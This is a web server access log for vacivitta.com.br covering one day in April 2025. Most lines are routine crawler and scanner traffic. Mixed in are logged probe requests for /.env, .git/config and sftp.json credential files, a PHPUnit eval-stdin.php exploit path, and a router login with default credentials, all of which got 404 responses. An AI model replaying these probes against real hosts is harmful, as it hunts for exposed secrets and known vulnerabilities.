3.140.200.144 - - [20/Apr/2025:01:33:16 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
vacivitta.com.br:80
3.140.200.144 - - [20/Apr/2025:01:38:07 -0300] "SSH-2.0-Go" 404 - "-" "-"
vacivitta.com.br:80
3.140.200.144 - - [20/Apr/2025:01:39:57 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:01:44:05 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:01:56:37 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
116.148.95.154 - - [20/Apr/2025:02:05:32 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
171.37.190.221 - - [20/Apr/2025:02:05:47 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
vacivitta.com.br:80
183.93.65.88 - - [20/Apr/2025:02:05:49 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
vacivitta.com.br:80
148.113.206.49 - - [20/Apr/2025:02:38:39 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible; ModatScanner/1.0; +https://modat.io/)"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:02:40:06 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:02:59:32 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:03:11:35 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
198.235.24.11 - - [20/Apr/2025:03:12:10 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
122.97.137.30 - - [20/Apr/2025:03:18:53 -0300] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 - "-" "-"
vacivitta.com.br:80
167.94.138.168 - - [20/Apr/2025:03:29:03 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.138.168 - - [20/Apr/2025:03:29:06 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.138.168 - - [20/Apr/2025:03:29:11 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.138.168 - - [20/Apr/2025:03:29:20 -0300] "PRI * HTTP/2.0" 404 - "-" "-"
vacivitta.com.br:80
104.248.46.193 - - [20/Apr/2025:03:29:23 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible)"
vacivitta.com.br:80
104.248.46.193 - - [20/Apr/2025:03:29:23 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "http://162.240.168.168/" "Mozilla/5.0 (compatible)"
vacivitta.com.br:80
167.94.138.168 - - [20/Apr/2025:03:29:27 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.138.168 - - [20/Apr/2025:03:29:28 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:03:54:38 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:03:55:28 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
64.62.197.179 - - [20/Apr/2025:03:59:16 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
45.33.50.24 - - [20/Apr/2025:04:03:49 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
45.33.50.24 - - [20/Apr/2025:04:05:12 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.2; rv:125.0) Gecko/20100101 Firefox/125.0"
vacivitta.com.br:80
45.33.50.24 - - [20/Apr/2025:04:05:12 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.2; rv:125.0) Gecko/20100101 Firefox/125.0"
vacivitta.com.br:80
45.33.50.24 - - [20/Apr/2025:04:05:22 -0300] "\x16\x03\x01\x02" 404 - "-" "-"
vacivitta.com.br:80
45.33.50.24 - - [20/Apr/2025:04:05:34 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
45.33.50.24 - - [20/Apr/2025:04:05:34 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
185.218.86.4 - - [20/Apr/2025:04:17:42 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
103.133.111.213 - - [20/Apr/2025:04:24:27 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
vacivitta.com.br:80
103.133.111.213 - - [20/Apr/2025:04:24:28 -0300] "POST / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
vacivitta.com.br:80
103.133.111.213 - - [20/Apr/2025:04:24:32 -0300] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "python-requests/2.25.1"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:04:28:44 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
5.183.209.244 - - [20/Apr/2025:04:36:23 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
147.139.145.197 - - [20/Apr/2025:04:49:47 -0300] "GET /YfGV HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
147.139.145.197 - - [20/Apr/2025:04:49:47 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
147.139.145.197 - - [20/Apr/2025:04:49:48 -0300] "GET /jquery-3.3.1.min.js HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
147.139.145.197 - - [20/Apr/2025:04:49:48 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:04:56:20 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:05:16:45 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.242.226.154 - - [20/Apr/2025:05:17:57 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
178.128.160.210 - - [20/Apr/2025:05:19:29 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
178.128.160.210 - - [20/Apr/2025:05:19:29 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
185.242.226.154 - - [20/Apr/2025:05:25:23 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
vacivitta.com.br:80
185.242.226.154 - - [20/Apr/2025:05:26:32 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Python/3.7 aiohttp/3.8.1"
vacivitta.com.br:80
185.242.226.154 - - [20/Apr/2025:05:26:32 -0300] "\x16\x03\x01\x02" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:05:33:27 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
104.234.115.83 - - [20/Apr/2025:06:02:06 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
104.234.115.83 - - [20/Apr/2025:06:02:23 -0300] "GET / HTTP/1.1" 200 488 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
154.81.156.51 - - [20/Apr/2025:06:03:12 -0300] "GET http://apiv4.9hits.com/test HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
104.234.115.83 - - [20/Apr/2025:06:04:47 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
104.234.115.83 - - [20/Apr/2025:06:04:53 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:06:16:16 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:06:43:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:06:48:47 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
5.183.209.244 - - [20/Apr/2025:06:48:59 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
196.251.72.19 - - [20/Apr/2025:06:57:16 -0300] "GET /.env_1 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1"
vacivitta.com.br:80
129.146.24.173 - - [20/Apr/2025:06:58:33 -0300] "PRI * HTTP/2.0" 404 - "-" "-"
vacivitta.com.br:80
185.218.86.4 - - [20/Apr/2025:07:12:27 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:07:20:13 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:07:54:55 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:08:01:13 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
80.82.77.202 - - [20/Apr/2025:08:12:00 -0300] "GET / HTTP/1.0" 200 488 "-" "Mozilla/5.0 (Linux; Android 8.1.0; Infinix X624B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Mobile Safari/537.36"
vacivitta.com.br:80
51.254.59.113 - - [20/Apr/2025:08:29:15 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:08:34:03 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:08:37:35 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:09:13:36 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
148.113.206.49 - - [20/Apr/2025:09:22:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
185.191.127.222 - - [20/Apr/2025:09:36:57 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
185.218.86.4 - - [20/Apr/2025:09:42:06 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:09:48:50 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:10:07:57 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
35.189.232.73 - - [20/Apr/2025:10:17:14 -0300] "GET / HTTP/1.1" 200 488 "-" "python-requests/2.32.3"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:10:26:49 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:10:42:46 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
93.174.93.12 - - [20/Apr/2025:11:00:07 -0300] "GET / HTTP/1.0" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:11:00:56 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:11:13:46 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:11:23:25 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:11:50:16 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
176.65.148.207 - - [20/Apr/2025:11:57:43 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.26"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:12:03:12 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
167.94.138.54 - - [20/Apr/2025:12:15:19 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
129.146.24.173 - - [20/Apr/2025:12:15:22 -0300] "PRI * HTTP/2.0" 404 - "-" "-"
vacivitta.com.br:80
167.94.138.54 - - [20/Apr/2025:12:15:27 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.138.54 - - [20/Apr/2025:12:15:28 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.138.54 - - [20/Apr/2025:12:15:31 -0300] "PRI * HTTP/2.0" 404 - "-" "-"
vacivitta.com.br:80
167.94.138.54 - - [20/Apr/2025:12:15:39 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.138.54 - - [20/Apr/2025:12:15:43 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
126.5.59.200 - - [20/Apr/2025:12:16:09 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:12:16:44 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
103.156.92.145 - - [20/Apr/2025:12:18:08 -0300] "GET /.env HTTP/1.1" 404 - "-" "python-requests/2.32.3"
vacivitta.com.br:80
103.156.92.145 - - [20/Apr/2025:12:18:09 -0300] "GET /.env.example HTTP/1.1" 404 - "-" "python-requests/2.32.3"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:12:20:58 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
20.171.30.213 - - [20/Apr/2025:12:33:21 -0300] "MGLNDD_162.240.168.168_80\n" 404 - "-" "-"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:12:42:46 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:12:48:34 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:13:07:38 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
196.251.72.19 - - [20/Apr/2025:13:17:33 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3880.4 Safari/537.36"
vacivitta.com.br:80
216.21.166.4 - - [20/Apr/2025:13:32:36 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:13:34:50 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:13:46:03 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.242.226.154 - - [20/Apr/2025:13:55:36 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
vacivitta.com.br:80
185.242.226.154 - - [20/Apr/2025:13:56:36 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Python/3.7 aiohttp/3.8.1"
vacivitta.com.br:80
185.242.226.154 - - [20/Apr/2025:13:57:23 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:14:01:37 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
128.203.201.21 - - [20/Apr/2025:14:08:38 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:14:16:16 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
80.82.77.202 - - [20/Apr/2025:14:17:41 -0300] "GET / HTTP/1.0" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3730.0 Safari/537.36"
vacivitta.com.br:80
103.149.195.16 - - [20/Apr/2025:14:30:33 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
vacivitta.com.br:80
209.141.45.70 - - [20/Apr/2025:14:31:27 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
209.141.45.70 - - [20/Apr/2025:14:31:28 -0300] "GET / HTTP/1.1" 404 - "-" "-"
vacivitta.com.br:80
209.141.45.70 - - [20/Apr/2025:14:31:29 -0300] "GET / HTTP/1.1" 200 488 "-" "l9tcpid/v1.1.0"
vacivitta.com.br:80
209.141.45.70 - - [20/Apr/2025:14:31:52 -0300] "GET /.config/sftp.json HTTP/1.1" 404 - "-" "l9explore/1.2.2"
vacivitta.com.br:80
209.141.45.70 - - [20/Apr/2025:14:31:58 -0300] "GET /sftp.json HTTP/1.1" 404 - "-" "l9explore/1.2.2"
vacivitta.com.br:80
209.141.45.70 - - [20/Apr/2025:14:32:00 -0300] "GET /.env HTTP/1.1" 404 - "-" "l9explore/1.2.2"
vacivitta.com.br:80
209.141.45.70 - - [20/Apr/2025:14:32:00 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "l9explore/1.2.2"
vacivitta.com.br:80
209.141.45.70 - - [20/Apr/2025:14:32:02 -0300] "GET /.vscode/sftp.json HTTP/1.1" 404 - "-" "l9explore/1.2.2"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:14:35:39 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:14:51:33 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
156.196.138.132 - - [20/Apr/2025:14:52:17 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:15:06:01 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:15:08:05 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.86.4 - - [20/Apr/2025:15:11:42 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
47.252.1.33 - - [20/Apr/2025:15:14:54 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
47.252.1.33 - - [20/Apr/2025:15:20:00 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/538.41 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
vacivitta.com.br:80
47.252.1.33 - - [20/Apr/2025:15:20:00 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/538.41 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
vacivitta.com.br:80
185.191.127.222 - - [20/Apr/2025:15:24:48 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
